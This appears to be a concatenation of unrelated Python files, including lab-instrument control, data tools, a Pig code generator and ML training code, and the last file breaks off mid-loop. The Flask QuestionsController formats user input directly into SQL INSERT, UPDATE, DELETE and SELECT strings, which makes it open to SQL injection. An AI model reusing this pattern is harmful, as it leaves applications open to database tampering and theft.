import visa
import numpy as np
import sys
import warnings
import time
import matplotlib.pyplot as plt
import multiprocessing as multi
import os
import time
import pandas as pd
# Import our classes
from sr_operators import *
from adv_op import *
import measure
import maths_op
from Setup import *
import saving
banner= """\
___ _ ___ _ _
/ __|___ ___ _ _ __ _ ___ __ _ _ _ __| | | _ \__ _| |__| |___ ___
| (_ / -_) _ \ '_/ _` / -_) / _` | ' \/ _` | | _/ _` | '_ \ / _ (_-<
\___\___\___/_| \__, \___| \__,_|_||_\__,_| |_| \__,_|_.__/_\___/__/
|___/
___ _
/ __|___ __| |___
| (__/ _ \/ _` / -_)
\___\___/\__,_\___|
###################################################################################
"""
os.system("clear")
print (banner)
#Set up the Lock-in Amplifier
rm =visa.ResourceManager()
print("Looking for the Sr830 DSP Lock-In Amplifier")
try:
i=0
while True:
sr830 = rm.open_resource(str(rm.list_resources()[i]))
i+=1
if 'Stanford_Research_Systems,' in sr830.query('*IDN?'):
print('\nSr830 DSP Lock-In Amplifier found.')
break
except:
warnings.warn('No Sr830 DSP Lock-In Amplifier found.')
sys.exit(0)
try:
i=0
while True:
source = rm.open_resource(str(rm.list_resources()[i]))
i+=1
if 'Agilent Technologies' in source.query('*IDN?'):
print('\nAgilent waveform generator found\n\nStarting measurements...')
break
except:
warnings.warn('No Sr830 DSP Lock-In Amplifier found.')
sys.exit(0)
os.system("mkdir results")
os.system("mkdir results/data")
os.system("mkdir results/Plots/")
os.system("clear")
print(banner)
try:
parameters = setup()
measure.data_V_I(sr830, source, parameters)
except KeyboardInterrupt:
sr830.clear()
os.system("clear")
print(banner)
print("Script exited by user")
saving.Latex()
os.system("clear")
sr830.clear()
|
mse = np.zeros((max_order + 1))
for order in range(0, max_order + 1):
X_design = make_design_matrix(x, order)
# Get prediction for the polynomial regression model of this order
y_hat = X_design @ theta_hats[order]
# Compute the residuals
residuals = y - y_hat
# Compute the MSE
mse[order] = np.mean(residuals ** 2)
with plt.xkcd():
fig, ax = plt.subplots()
ax.bar(range(max_order + 1), mse);
ax.set(title='Comparing Polynomial Fits', xlabel='Polynomial order', ylabel='MSE')
|
"""With this script users can download the final HTML dataset from Internet Archive.
This is a script for downloading whole HTML dataset which is
hosted on Internet Archive. Note that the whole dataset is 7TB
compressed. If the script fails while execution, it can be
safely restarted. The internetarchive doesn't re-download files
that have been already successfully downloaded.
Example
-------
python download_whole_dataset.py
"""
import os
from internetarchive import download
with open("file_names.txt") as f:
file_names = f.readlines()
file_names = [x.strip() for x in file_names]
print("Starting the download process, this may take a while...")
for ia_item in file_names:
if ia_item != "enwiki-20190301-original-full-history-dump_dlab":
ia_item = ia_item + "_html_dlab"
flag = download(ia_item)
if flag == False:
print("Error occurred while downloading the data! Please rerun the script.")
exit(1)
print("The download process finished successfully!")
|
from flask_jwt_extended import get_jwt_identity
from datetime import datetime
from src.users.controller import ( conn, cur)
class QuestionsController:
"""Question controller interfaces with the database."""
def __init__(self):
"""Initializes the questions controller class."""
conn.create_questions_table()
@staticmethod
def create_question(data):
"""Creates a question."""
question_author = get_jwt_identity()['username']
sql = """INSERT INTO questions(question_title, question_author, question_body)
VALUES ('{}', '{}','{}')"""
sql_command = sql.format(data['question_title'],
question_author,
data['question_body'])
cur.execute(sql_command)
@staticmethod
def delete_question(question_id):
''' Deletes a question '''
sql = """ DELETE FROM questions WHERE question_id ='{}'"""
sql_command = sql.format(question_id)
cur.execute(sql_command)
@staticmethod
def query_question(question_id):
''' selects a question from database '''
sql = """ SELECT * FROM questions WHERE question_id ='{}' """
sql_command = sql.format(question_id)
cur.execute(sql_command)
row = cur.fetchone()
return row
@staticmethod
def update_question(data, question_id):
"""Updates a question."""
sql = """UPDATE questions SET question_title='{}',\
question_body='{}' ,updated_at='{}' WHERE question_id='{}'"""
sql_command = sql.format(data['question_title'], data['question_body'],
datetime.now(), question_id)
cur.execute(sql_command)
sql = """ SELECT * FROM questions WHERE question_id ='{}' """
sql_command = sql.format(question_id)
cur.execute(sql_command)
row = cur.fetchone()
if row:
return row
@staticmethod
def query_all_questions():
''' selects all available questions from the database '''
sql = """ SELECT * FROM questions """
cur.execute(sql)
rows = cur.fetchall()
return rows
@staticmethod
def check_question_author(question_id):
"""return checks author for authorization purposes"""
username = get_jwt_identity()['username']
sql = """SELECT question_author FROM questions WHERE question_id='{}'"""
cur.execute(sql.format(question_id))
row = cur.fetchone()
if row and row[0] == username:
return True
else:
return False
|
"""
Copyright (c) 2020 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
import logging
import sys
import os
from detector.tools.trend.detect import Detector
m_logger = logging.getLogger('detector')
class Forecaster:
"""
This class is used for forecasting future trends for timeseries based on
timeseries forecast algorithm
"""
def __init__(self, *args, **kwargs):
self.minimum_timeseries_length = 4
self.database_dir = kwargs['database_dir']
self.forecast_alg = kwargs['forecast_alg']
self.data_period = kwargs['data_period']
self.interval = kwargs['interval']
self.period = kwargs['period']
self.freq = kwargs['freq']
self.data_handler = kwargs['data_handler']
self.trend_service_list = kwargs['trend_service_list']
self.forecast_handler = kwargs['forecast_handler']
self.metric_config = kwargs['metric_config']
def run(self):
for database in os.listdir(self.database_dir):
with self.data_handler(os.path.join(self.database_dir, database)) as db:
if 'journal' in database:
continue
try:
tables = db.get_all_tables()
last_timestamp = None
for table in self.trend_service_list:
if table not in tables:
m_logger.warning("Table {table} is not in {database}.".format(table=table, database=database))
continue
fields = db.get_all_fields(table)
if not last_timestamp:
last_timestamp = db.get_latest_timestamp(table)
for field in fields:
forecast_result = {}
timeseries = db.get_timeseries(table=table, field=field, period=self.data_period,
timestamp=last_timestamp)
if not timeseries:
m_logger.error("Can not get time series from {table}-{field} by period '{period}', "
"skipping forecast.".format(table=table, field=field,
period=self.data_period))
forecast_result['status'] = 'fail'
continue
if len(timeseries) < self.minimum_timeseries_length:
m_logger.error(
"The length of time series in {table}-{field} is too short: [{ts_length}], "
"so you can adjust 'data_period'.".format(table=table, field=field,
ts_length=len(timeseries)))
continue
self.forecast_handler.fit(timeseries)
date, value = self.forecast_handler.forecast(period=self.period, freq=self.freq)
try:
minimum = None if not self.metric_config.has_option(
table, field + '_minimum') else self.metric_config.getfloat(
table, field + '_minimum')
maximum = None if not self.metric_config.has_option(
table, field + '_maximum') else self.metric_config.getfloat(
table, field + '_maximum')
except Exception as e:
m_logger.error("{table} - {field}: {err}".format(table=table, field=field, err=str(e)))
continue
if minimum is None and maximum is None:
m_logger.error("{table} - {field}: The minimum and maximum is not provided, you should at least provide one of it.".format(table=table, field=field))
continue
if minimum is not None and maximum is not None and minimum > maximum:
m_logger.error("{table} - {field}: The minimum is greater than the maximum.".format(table=table, field=field))
continue
detect_basis = {'minimum': minimum, 'maximum': maximum}
forecast_result['status'] = 'success'
forecast_result['metric_name'] = table + '-->' + field
forecast_result['detect_basis'] = detect_basis
forecast_result['future_date'] = date
forecast_result['future_value'] = value
Detector.detect(forecast_result)
except Exception as e:
m_logger.error(str(e), exc_info=True)
sys.exit(-1)
|
class ArbitrageConfig(object):
def __init__(self, options={}):
self.name = options['name']
self.base_coin = options['base_coin']
self.quote_coin = options['quote_coin']
self.symbol = f"{self.base_coin}/{self.quote_coin}"
self.one_to_two_pure_profit_limit = float(options['one_to_two_pure_profit_limit']) # exchange1 低买 exchange2 高卖 纯利润限制, 5%
self.two_to_one_pure_profit_limit = float(options['two_to_one_pure_profit_limit']) # exchange2 低买 exchange1 高卖 纯利润限制, 5%
self.min_buy_num_limit_by_quote = options['min_buy_num_limit_by_quote'] # 最小交易币数,有些市场限制了小于此个数会创建订单导致失败
if self.min_buy_num_limit_by_quote is not None:
self.min_buy_num_limit_by_quote = float(self.min_buy_num_limit_by_quote)
self.max_buy_num_limit_by_quote = options['max_buy_num_limit_by_quote'] # 最大交易数,防止单方交易失败导致损失太多
if self.max_buy_num_limit_by_quote is not None:
self.max_buy_num_limit_by_quote = float(self.max_buy_num_limit_by_quote)
self.max_open_order_limit = float(options['max_open_order_limit']) # 当前挂单数限制,防止异常单太多
self.base_coin_num = float(options['base_coin_num']) # 基本币数量,用于计算利润,因数量少会导致转帐手续费占比高
self.quote_coin_num = float(options['quote_coin_num']) # 报价币数量
self.exchange1_api_key = options['exchange1_api_key'] # api key
self.exchange1_secret = options['exchange1_secret']
self.exchange1_password = options.get('exchange1_password', None)
self.exchange1_new_ws = options.get('exchange1_new_ws', None)
self.exchange2_api_key = options['exchange2_api_key']
self.exchange2_secret = options['exchange2_secret']
self.exchange2_password = options.get('exchange2_password', None)
self.exchange2_new_ws = options.get('exchange2_new_ws', None)
self.exchange1_id = options['exchange1_id']
self.exchange2_id = options['exchange2_id']
self.exchange1_taker_fee = float(options['exchange1_taker_fee']) # 市场1吃单成交费用, 1% 之类的
self.exchange2_taker_fee = float(options['exchange2_taker_fee'])
self.exchange1_withdraw_base_fee = float(options['exchange1_withdraw_base_fee']) # 提现统一预估一个固定值,而不是百分比
self.exchange1_withdraw_quote_fee = float(options['exchange1_withdraw_quote_fee'])
self.exchange2_withdraw_base_fee = float(options['exchange2_withdraw_base_fee'])
self.exchange2_withdraw_quote_fee = float(options['exchange2_withdraw_quote_fee'])
self.base_coin_alert_num = float(options['base_coin_alert_num']) # 基本币余额提醒限制,小于此时提醒
self.quote_coin_alert_num = float(options['quote_coin_alert_num'])
self.bisect_coin = options['bisect_coin'] # 计算利润时,是否按照平分币两到个市场计算,还是按一个.如果经常是单边市场,可以设置成 False
self.enable_transfer = options['enable_transfer'] # 不开启转帐交易,则默认不计算提现费.适合两个市场互相有溢价,或手续费过高
|
__author__ = 'Bohdan Mushkevych'
from io import TextIOWrapper
from typing import Union
from grammar.sdplParser import sdplParser
from parser.abstract_lexicon import AbstractLexicon
from parser.data_store import DataStore
from parser.projection import RelationProjection, FieldProjection, ComputableField
from schema.sdpl_schema import Schema, Field, MIN_VERSION_NUMBER, DataType, Compression
class PigLexicon(AbstractLexicon):
def __init__(self, output_stream: TextIOWrapper) -> None:
super(PigLexicon, self).__init__(output_stream)
def _jdbc_datasink(self, data_sink: DataStore):
field_names = [f.name for f in data_sink.relation.schema.fields]
values = ['?' for _ in range(len(field_names))]
out = "REGISTER /var/lib/sdpl/postgresql-42.0.0.jar;\n"
out += "REGISTER /var/lib/sdpl/piggybank-0.16.0.jar;\n"
out += "STORE {0} INTO 'hdfs:///unused-ignore' ".format(data_sink.relation.name)
out += "USING org.apache.pig.piggybank.storage.DBStorage(\n"
out += " 'org.postgresql.Driver',\n"
out += " 'jdbc:postgresql://{0}:{1}/{2}',\n".format(data_sink.data_repository.host,
data_sink.data_repository.port,
data_sink.data_repository.db)
out += " '{0}', '{1}',\n".format(data_sink.data_repository.user, data_sink.data_repository.password)
out += " 'INSERT INTO {0} ({1}) VALUES ({2})'\n".format(data_sink.table_name,
','.join(field_names), ','.join(values))
out += ');'
return out
def _file_datasink(self, data_sink: DataStore):
if data_sink.data_repository.data_type == DataType.CSV.name:
store_function = "PigStorage(',')"
elif data_sink.data_repository.data_type == DataType.TSV.name:
store_function = "PigStorage()"
elif data_sink.data_repository.data_type == DataType.BIN.name:
store_function = "BinStorage()"
elif data_sink.data_repository.data_type == DataType.JSON.name:
store_function = "JsonStorage()"
elif data_sink.data_repository.data_type == DataType.ORC.name:
is_snappy = data_sink.data_repository.compression == Compression.SNAPPY.name
store_function = "OrcStorage('-c SNAPPY')" if is_snappy else "OrcStorage()"
else:
store_function = "PigStorage()"
if not data_sink.data_repository.host:
# local file system
fqfp = '/{0}/{1}'.format(data_sink.data_repository.db.strip('/'),
data_sink.table_name)
else:
# distributed file system
fqfp = '{0}:{1}/{2}/{3}'.format(data_sink.data_repository.host.strip('/'),
data_sink.data_repository.port,
data_sink.data_repository.db.strip('/'),
data_sink.table_name)
store_string = "STORE {0} INTO '{1}' USING {2} ;".format(data_sink.relation.name, fqfp, store_function)
return store_string
def _jdbc_datasource(self, data_source: DataStore):
raise NotImplementedError('pig_schema._jdbc_datasource is not supported')
def _file_datasource(self, data_source: DataStore):
if data_source.data_repository.data_type == DataType.CSV.name:
load_function = "PigStorage(',')"
elif data_source.data_repository.data_type == DataType.TSV.name:
load_function = "PigStorage()"
elif data_source.data_repository.data_type == DataType.BIN.name:
load_function = "BinStorage()"
elif data_source.data_repository.data_type == DataType.JSON.name:
load_function = "JsonLoader()"
elif data_source.data_repository.data_type == DataType.ORC.name:
is_snappy = data_source.data_repository.compression == Compression.SNAPPY.name
load_function = "OrcStorage('-c SNAPPY')" if is_snappy else "OrcStorage()"
else:
load_function = "PigStorage()"
if not data_source.data_repository.host:
# local file system
fqfp = '/{0}/{1}'.format(data_source.data_repository.db.strip('/'),
data_source.table_name)
else:
# distributed file system
fqfp = '{0}:{1}/{2}/{3}'.format(data_source.data_repository.host.strip('/'),
data_source.data_repository.port,
data_source.data_repository.db.strip('/'),
data_source.table_name)
load_string = "LOAD '{0}' USING {1} AS ({2})".\
format(fqfp, load_function, self.parse_schema(data_source.relation.schema))
return load_string
@classmethod
def comment_delimiter(cls):
return '--'
def parse_datasource(self, data_source: DataStore):
if data_source.data_repository.is_file_type:
return self._file_datasource(data_source)
else:
return self._jdbc_datasource(data_source)
def parse_datasink(self, data_sink: DataStore):
if data_sink.data_repository.is_file_type:
return self._file_datasink(data_sink)
else:
return self._jdbc_datasink(data_sink)
def parse_field(self, field: Field):
out = '{0}:{1}'.format(field.name, field.field_type)
return out
def parse_field_projection(self, field: Union[FieldProjection, ComputableField]):
if isinstance(field, ComputableField):
return '{0} AS {1}'.format(field.expression, field.field_name)
elif isinstance(field, FieldProjection):
return '{0}.{1} AS {2}'.format(field.schema_name, field.field_name, field.as_field_name)
else:
raise TypeError('Unsupported type for field projection: {0}'.format(type(field)))
def parse_schema(self, schema: Schema, max_version=MIN_VERSION_NUMBER):
filtered_fields = [f for f in schema.fields if f.version <= max_version]
out = ',\n '.join([self.parse_field(field) for field in filtered_fields])
out = '\n ' + out + '\n'
return out
def parse_operand(self, ctx: sdplParser.OperandContext):
# SDPL operand semantics are the same as in Pig
return ctx.getText()
def parse_filter_terminal_node(self, element: str) -> tuple:
# SDPL terminal node are: "AND" "OR" and are the same as in Pig
return element, None
def emit_udf_registration(self, udf_fqfp: str, udf_alias:str):
out = 'REGISTER {0}'.format(udf_fqfp)
out += ' AS {0};'.format(udf_alias) if udf_alias else ';'
self._out(out)
def emit_releation_decl(self, relation_name: str, data_source: DataStore):
self._out("{0} = {1};".format(relation_name, self.parse_datasource(data_source)))
def emit_schema_projection(self, left_relation_name: str, right_relation_name: str, output_fields: list):
""" method iterates over the projection and emits FOREACH ... GENERATE code
NOTICE: computable fields are placed at the tail of the GENERATE block """
self._out('{0} = FOREACH {1} GENERATE'.format(left_relation_name, right_relation_name))
output = ',\n '.join([self.parse_field_projection(f) for f in output_fields])
self._out(' ' + output)
self._out(';')
def emit_join(self, relation_name: str, column_names: list, projection: RelationProjection) -> None:
"""
:param relation_name: name of joined relation
:param column_names: list in format [(relation_name, column_name), ..., (relation_name, column_name)]
:param projection:
:return: None
"""
# step 0: reformat list [(relation_name, column_name), ..., (relation_name, column_name)] into
# dict {relation_name: [column_name, ..., column_name]}
join_elements = self.column_list_to_dict(column_names)
# step 1: Generate JOIN name as JOIN_SA_SB_..._SZ
join_name = 'JOIN'
join_body = ''
for element_name, join_columns in join_elements.items():
join_name += '_' + element_name.upper()
if not join_body:
# this is the first cycle of the loop
join_body = 'JOIN {0} BY '.format(element_name)
else:
join_body += ', {0} BY '.format(element_name)
# format output so it contains relation name: a -> A.a
join_columns = ['{0}.{1}'.format(element_name, column_name) for column_name in join_columns]
join_body += '(' + ','.join(join_columns) + ')'
self._out('{0} = {1} ;'.format(join_name, join_body))
# step 2: expand schema with FOREACH ... GENERATE
output_fields = projection.fields + projection.computable_fields
self.emit_schema_projection(relation_name, join_name, output_fields)
def emit_filterby(self, relation_name: str, source_relation_name: str, filter_exp: str) -> None:
self._out('{0} = FILTER {1} BY {2} ;'.format(relation_name, source_relation_name, filter_exp))
def emit_orderby(self, relation_name: str, source_relation_name: str, column_names: list) -> None:
# ID = ORDER ID BY relationColumn (, relationColumn)* ;
by_clause = ['{0}.{1}'.format(*entry) for entry in column_names]
out = ', '.join(by_clause)
self._out('{0} = ORDER {1} BY {2} ;'.format(relation_name, source_relation_name, out))
def emit_groupby(self, relation_name: str, source_relation_name: str, column_names: list):
# ID = ORDER ID BY relationColumn (, relationColumn)* ;
by_clause = ['{0}.{1}'.format(*entry) for entry in column_names]
out = ', '.join(by_clause)
self._out('{0} = GROUP {1} BY {2} ;'.format(relation_name, source_relation_name, out))
|
"""Module with utitlity functions."""
import json
import numpy as np
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if np.issubdtype(type(obj), np.integer):
return int(obj)
if np.issubdtype(type(obj), np.floating):
return float(obj)
return json.JSONEncoder.default(self, obj)
|
import os
from pathlib import Path
from pelican import signals
# Function extracted from https://stackoverflow.com/a/19308592/7690767
# Las tres funciones que le dan toda la funcionalidad al plugin
def get_filepaths(directory, extensions=[], ignores=[]): # ignore es una lista de archivo que se deben ignorar
file_paths = [] # List which will store all of the full filepaths.
exts = extensions
if isinstance(extensions, str):
exts = [extensions]
igns = ignores
if isinstance(ignores, str):
igns = [ignores]
# Walk the tree , de manera recursiva
for root, directories, files in os.walk(directory):
for filename in files:
if filename in igns or not any(filename.endswith(f".{ext}") for ext in exts):
continue
filepath = Path(root, filename)
file_paths.append(filepath)
return file_paths
# dos archivos, el destino y cada uno de las lista.
def create_bundle(files, output):
with open(output, 'w') as outfile: # abrir el archivo destino y sobreescribir si existe y si no lo crea
for fname in files:
with open(fname) as infile: # para cada uno delos archivos
outfile.write('\n\n') # dos líneas en blanco
for line in infile:
outfile.write(line)
# función a la que se suscribe
def create_bundles(sender):
theme_path = sender.settings.get('THEME', None) # leer la variable donde está alojado el tema
if theme_path is None: # se espera que no sea None sino termina la ejecución
return
# creación de paquetes independientes, comportamiento del sitio y la parte estética del sitio
js_bundle = f'{theme_path}/static/js/scripts_bundled.js' # variable de archivo destino
js_filenames = get_filepaths(theme_path, 'js', "scripts_bundled.js")# conseguir listado de las rutas que son archivos JavaScript
create_bundle(js_filenames, js_bundle) # concatenación y sobreescritura
css_bundle = f'{theme_path}/static/css/style_bundled.css' # variable de archivo destino
css_filenames = get_filepaths(theme_path, 'css', "style_bundled.css")# conseguir listado de las rutas que son archivos css
create_bundle(css_filenames, css_bundle)
# suscripción de pelican initialized aunque los archivos CSS y JavaScript serán empaquetados, esto en realidad, se podría hacer al inicio o al final
def register():
signals.initialized.connect(create_bundles)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
''' Copyright 2012 Smartling, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this work except in compliance with the License.
* You may obtain a copy of the License in the LICENSE file, or at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
'''
import os
import sys
lib_path = os.path.abspath('../')
sys.path.append(lib_path) # allow to import ../smartlingApiSdk/SmartlingFileApi
from smartlingApiSdk.SmartlingFileApiV2 import SmartlingFileApiV2
from smartlingApiSdk.ProxySettings import ProxySettings
from smartlingApiSdk.SmartlingDirective import SmartlingDirective
from smartlingApiSdk.Credentials import Credentials
class SmartlingApiExample:
def __init__(self, file_name, file_type, new_name):
credentials = Credentials() #Gets your Smartling credetnials from environment variables
self.MY_USER_IDENTIFIER = credentials.MY_USER_IDENTIFIER
self.MY_USER_SECRET = credentials.MY_USER_SECRET
self.MY_PROJECT_ID = credentials.MY_PROJECT_ID
self.MY_LOCALE = credentials.MY_LOCALE
useProxy = False
if useProxy :
proxySettings = ProxySettings("login", "password", "proxy_host", "proxy_port")
else:
proxySettings = None
self.fapi = SmartlingFileApiV2( self.MY_USER_IDENTIFIER, self.MY_USER_SECRET, self.MY_PROJECT_ID, proxySettings)
self.file_type = file_type
self.file_name = file_name
self.new_name = new_name
def printMarker(self, caption):
print "--" + caption + "-" * 40
def test_import(self, name_to_import):
""" this method tests `import` command """
self.printMarker("file upload")
#upload file first to be able upload it's translations later
path = FILE_PATH + self.file_name
resp, code = self.fapi.upload(path, self.file_type)
if 200!=code:
raise "failed"
print resp, code
self.printMarker("files list")
#list all files to ensure upload worked
resp, code = self.fapi.list()
print resp, code
self.printMarker("importing uploaded")
#set correct uri/name for file to be imported
path_to_import = FILE_PATH + name_to_import
#import translations from file
resp, code = self.fapi.import_call(path, path_to_import,
self.file_type, self.MY_LOCALE,
translationState="PUBLISHED")
print resp, code
if 200!=code:
raise "failed"
#perform `last_modified` command
self.printMarker("last modified")
resp, code = self.fapi.last_modified(path, self.MY_LOCALE)
print "resp.code=", resp.code
print "resp.data", resp.data
self.printMarker("delete from server goes here")
#delete test file imported in the beginning of test
resp, code = self.fapi.delete(path)
print resp, code
def test(self):
""" simple illustration for set of API commands: upload, list, status, get, rename, delete """
self.printMarker("file upload")
path = FILE_PATH + self.file_name
directives={"placeholder_format_custom" : "\[.+?\]"}
resp, code = self.fapi.upload(path, self.file_type, authorize="true", callbackUrl=CALLBACK_URL, directives=directives)
print resp, code
if 200!=code:
raise "failed"
self.printMarker("files list")
resp, code = self.fapi.list()
print resp, code
self.printMarker("file status")
resp, code = self.fapi.status(path)
print resp, code
self.printMarker("file from server goes here")
resp, code = self.fapi.get(path, self.MY_LOCALE)
print resp, code
self.printMarker("renaming file")
resp, code = self.fapi.rename(path, self.new_name)
print resp, code
self.printMarker("delete from server goes here")
resp, code = self.fapi.delete(self.new_name)
print resp, code
self.printMarker("doing list again to see if it's deleted")
resp, code = self.fapi.list()
print resp, code
FILE_NAME = "java.properties"
FILE_NAME_UTF16 = "javaUTF16.properties"
FILE_TYPE = "javaProperties"
FILE_PATH = "../resources/"
FILE_NAME_RENAMED = "java.properties.renamed"
CALLBACK_URL = "http://yourdomain.com/callback"
FILE_NAME_IMPORT = "test_import.xml"
FILE_NAME_TO_IMPORT = "test_import_es.xml"
FILE_TYPE_IMPORT ="android"
def upload_test():
#test simple file
example = SmartlingApiExample(FILE_NAME, FILE_TYPE, FILE_NAME_RENAMED)
example.test()
def import_test():
#example for import and last_modified commands
example = SmartlingApiExample(FILE_NAME_IMPORT, FILE_TYPE_IMPORT, FILE_NAME_RENAMED)
example.test_import(FILE_NAME_TO_IMPORT)
upload_test()
import_test()
|
import glob
import matplotlib.pyplot as plt
# from Gnn_Models.model import GCN
# from Gnn_Models import model
import numpy as np
import torch
import torch.nn.functional as F
from sklearn.ensemble import RandomForestRegressor
from torch_geometric.nn import GCNConv
from torch_geometric.transforms import RandomLinkSplit
from Dataset import gsp_dataset
from Embeddings.Auto_Encoder import pairwise_auto_encoder
from Embeddings.Node2Vec import node_representations
from sklearn.metrics import mean_absolute_error, mean_squared_error
class GCN(torch.nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels):
super(GCN, self).__init__()
torch.manual_seed(42)
# Initialize the layers
self.conv1 = GCNConv(in_channels, hidden_channels)
self.conv2 = GCNConv(hidden_channels, out_channels)
def forward(self, x, edge_index):
# First Message Passing Layer (Transformation)
x = self.conv1(x, edge_index)
x = x.relu()
x = F.dropout(x, p=0.5, training=self.training)
# Second Message Passing Layer
x = self.conv2(x, edge_index)
return x
# class GCN(torch.nn.Module):
# def __init__(self, hidden_channels):
# super(GCN, self).__init__()
# torch.manual_seed(12345)
# self.conv1 = GCNConv(train_data.num_features, hidden_channels)
# self.conv2 = GCNConv(hidden_channels, 100)
# self.linear1 = torch.nn.Linear(100, 1)
#
# def forward(self, x, edge_index):
# x = self.conv1(x, edge_index)
# x = x.relu()
# x = F.dropout(x, p=0.5, training=self.training)
# x = self.conv2(x, edge_index)
# x = self.linear1(x)
# return x
def train(model):
model.train()
optimizer.zero_grad() # Clear gradients.
# out = model(dataset.x, dataset.edge_index) # Perform a single forward pass.
out = model(train_data.x, train_data.edge_index)
print(out)
print(train_data.y)
# loss = criterion(out[dataset.train_mask], dataset.y[dataset.train_mask]) # Compute the loss solely based on the training nodes.
loss = criterion(out.squeeze(), train_data.y.squeeze()) # view(-1, 1))
loss.backward(retain_graph=True) # Derive gradients.
optimizer.step() # Update parameters based on gradients.
return loss
def test(model):
model.eval()
out = model(test_data.x, test_data.edge_index)
test_loss = criterion(out.squeeze(), test_data.y.squeeze()) # .y.view(-1, 1)
# Derive ratio of correct predictions.
return test_loss
def ground_truth(main_val, data):
data_aggr = []
window = 20
for k in range(0, int(np.floor(len(main_val) / window))):
data_aggr.append(np.mean(main_val[k * window:((k + 1) * window)]))
if (len(main_val) % window > 0):
data_aggr.append(np.mean(main_val[int(np.floor(len(main_val) / window)) * window:]))
delta_p = [np.round(data_aggr[i + 1] - data_aggr[i], 2) for i in range(0, len(data_aggr) - 1)]
# freq_data = data.y.detach().numpy() / np.linalg.norm(data.y.detach().numpy())
# freq_data = delta_p / np.linalg.norm(delta_p)
plt.figure(figsize=(10, 5))
plt.title("Consumption")
# plt.plot(val_losses, label="val")
print(data.y.detach().numpy())
plt.plot(list(data.y.detach().numpy()), label="fourier_transform")
plt.show()
plt.plot(delta_p, label="ground_truth")
plt.xlabel("time")
plt.ylabel("power_con")
plt.legend()
plt.show()
return data_aggr
def evaluate(model, test_features, test_labels):
predictions = model.predict(test_features)
errors = abs(predictions - test_labels)
mape = 100 * np.mean(errors / test_labels)
accuracy = 100 - mape
print('Model Performance')
print('Average Error: {:0.4f} degrees.'.format(np.mean(errors)))
print('Accuracy = {:0.2f}%.'.format(accuracy))
return accuracy
def conventional_ml(train_data, test_data):
param_grid = {
'bootstrap': [True],
'max_depth': [80, 90, 100, 110],
'max_features': [2, 3],
'min_samples_leaf': [3, 4, 5],
'min_samples_split': [8, 10, 12],
'n_estimators': [100, 200, 300, 1000]
}
# param_grid = {
# 'bootstrap': [True],
# 'max_depth': [80, 90, 100, 110],
# 'max_samples': [0.25, 0.5, 0.75],
# 'max_features': [2, 3, 4],
# 'min_samples_leaf': [2, 3, 4, 5],
# 'min_samples_split': [7, 8, 9, 10, 12],
# 'n_estimators': [50, 100, 200, 300, 1000]
# }
from sklearn.model_selection import GridSearchCV
import warnings
base_model = RandomForestRegressor(n_estimators=10, random_state=42)
base_model.fit(train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel())
base_accuracy = evaluate(base_model, train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel())
regr = RandomForestRegressor(random_state=0)
CV_regr = GridSearchCV(estimator=regr, param_grid=param_grid,
cv=5, n_jobs=-1, verbose=2, return_train_score=True)
with warnings.catch_warnings(record=True) as w:
try:
CV_regr.fit(train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel())
except ValueError:
pass
# print(repr(w[-1].message))
# train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel()
# CV_regr.fit(np.array(train_data.x), np.array(train_data.y).ravel())
print(f'best parameters: {CV_regr.best_params_}')
best_grid = CV_regr.best_estimator_
grid_accuracy = evaluate(best_grid, test_data.x.detach().numpy(), test_data.y.detach().numpy().ravel())
print('Improvement of {:0.2f}%.'.format(100 * (grid_accuracy - base_accuracy) / base_accuracy))
mse = mean_squared_error(np.array(test_data.y.detach().numpy().ravel()), best_grid.predict(test_data.x.detach().numpy())) # .reshape(-1, 1)
mae = mean_absolute_error(test_data.y.detach().numpy().ravel(), best_grid.predict(test_data.x.detach().numpy()))
print(f'best_estimator {best_grid}')
print(f'mse: {mse}')
print(f'mae: {mae}')
return best_grid.predict(test_data.x.detach().numpy()).reshape(-1)
path = r'data/processed'
all_files = glob.glob(path + "/*.pt")
devices = [filename for filename in all_files]
index = 0
for filename in all_files:
# if not filename.__contains__('dishwasher'):
# continue
data = torch.load(f'{filename}')
print('-------------------------------------------------------------------')
print(filename.split('/')[-1].strip('.csv'))
data.num_classes = len(data.y.unique())
embedding_method = 'AE'
if embedding_method == 'Node2Vec':
embeddings = node_representations(data)
data.x = embeddings.data
elif embedding_method == 'AE':
data = pairwise_auto_encoder(data)
else:
print(data.x)
data.y = data.y.type(torch.FloatTensor)
print(data.x)
print(data.y)
print(data)
transform = RandomLinkSplit(is_undirected=True)
train_data, val_data, test_data = transform(data)
print(train_data, val_data, test_data)
index += 1
# pred = conventional_ml(train_data, test_data)
#
# plt.title("Predicted/ G-truth")
# plt.plot(pred, label="pred")
# plt.plot(test_data.y.view(-1, 1), label="g_truth", alpha=0.5)
# plt.title(str(index))
# plt.xlabel("timestep")
# plt.ylabel("delta_p")
# plt.legend()
# plt.show()
# from utils import mse
# print(mse(np.array(test_data.y.view(-1, 1)), pred))
# continue
# print('End Pip
# exit()
# exit()
#
from utils import mse
y_true = data.y.cpu().detach().numpy()
y_hat = np.mean(y_true)
print(mse(np.array([y_hat] * y_true.shape[0]), y_true))
# exit('By Marinos')
model = GCN(in_channels=4, hidden_channels=4, out_channels=1)
optimizer = torch.optim.Adam(model.parameters(), lr=0.1, weight_decay=5e-4)
criterion = torch.nn.MSELoss()
epochs = 20
train_losses = []
val_losses = []
print(np.unique(data.y.view(-1, 1)))
for epoch in range(1, 50):
